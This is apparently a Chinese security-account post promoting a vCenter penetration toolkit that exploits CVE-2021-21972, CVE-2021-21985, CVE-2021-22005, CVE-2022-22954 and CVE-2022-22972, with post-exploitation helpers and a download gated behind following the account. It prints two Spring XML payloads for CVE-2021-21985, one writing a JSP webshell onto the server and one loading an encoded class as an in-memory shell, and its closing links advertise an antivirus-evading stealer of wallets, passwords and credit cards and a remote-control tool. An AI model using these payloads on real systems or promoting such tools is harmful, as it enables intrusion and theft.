免责声明
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!所有工具安全性自测!!!VX:baobeiaini_ya
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全“设为星标”,否则可能就看不到了啦!
工具介绍
Vcenter综合渗透利用工具包
工具使用
1.2 信息收集模块
直接输入url
即可进行信息搜集,如果存在本地文件读取的话,程序会自动读取数据库文件;有些网站是没有sdk
接口的,也就无法通过这种方式来查询信息,后续会研究其他的方法:
1.3 CVE-2021-21972模块
主要利用思维导图如下:
可以看到,并非所有情况下都能100%
成功上传文件的,因此这里我把这些利用链(除了写authorized_keys
)全部写在代码里面了,依次尝试。
这里放上之前测试利用搭建的环境的截图:
上传哥斯拉马:
1.4 CVE-2021-21985模块
需要注意的是,这里的RMI
和Command
只能二选一填写,目前rmi
由于测试环境的问题,还没有进行测试,可能会有问题,但是command
目前测试下来没什么问题,这里放上一张之前写的时候测试的截图:
需要注意的是,当前版本(v0.0.3
)的shell
上传和内存马打入模块还没实现。但是核心思想就是替换xml
:
以下参考:https://daidaitiehanhan.github.io/2022/04/18/vCenter2021几个漏洞及后渗透/#不出网利用
上传shell
的xml
:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.io.PrintWriter">
<constructor-arg>
<value>/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/log2.jsp</value>
</constructor-arg>
</bean>
<bean id="is" class="java.lang.String">
<constructor-arg>
<value><![CDATA[<% out.println("ok"); %> ]]></value>
</constructor-arg>
<property name="whatever" value="#{ pb.println(is).close()}"/>
</bean>
</beans>
打内存马要用到的xml:
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="com.sun.org.apache.bcel.internal.util.ClassLoader">
</bean>
<bean id="is" class="java.lang.String">
<constructor-arg>
<value><![CDATA[$$BCEL$$...]]></value>
</constructor-arg>
<property name="whatever" value="#{ pb.loadClass(is).newInstance()}"/>
</bean>
</beans>
1.5 CVE-2021-22005模块
这里的shell name
可写可不写,不写的话就是自动生成6
位的名字。
测试截图:
1.6 CVE-2022-22954
测试截图如下:
1.7 CVE-2022-22972
1.8 后渗透利用模块
本来是想把这些脚本集成到工具里面的,但是转念一想,没必要,直接弄成点按钮生成脚本到本地这种形式就可以了,这样直接一个工具走天下。
1.9 渗透测试记事本
这里我放上去了一些打vcenter的时候常用的命令、常看的文章。
工具下载
点击关注下方名片进入公众号
回复关键字【241102】获取下载链接
往期精彩
通过 Telegram+Clipper 记录 FUD Stealer 可以绕过所有防病毒软件(抓取:钱包、密码、信用卡等)
Burpsuit插件集合,共31+
一款易语言制作的多功能远控程序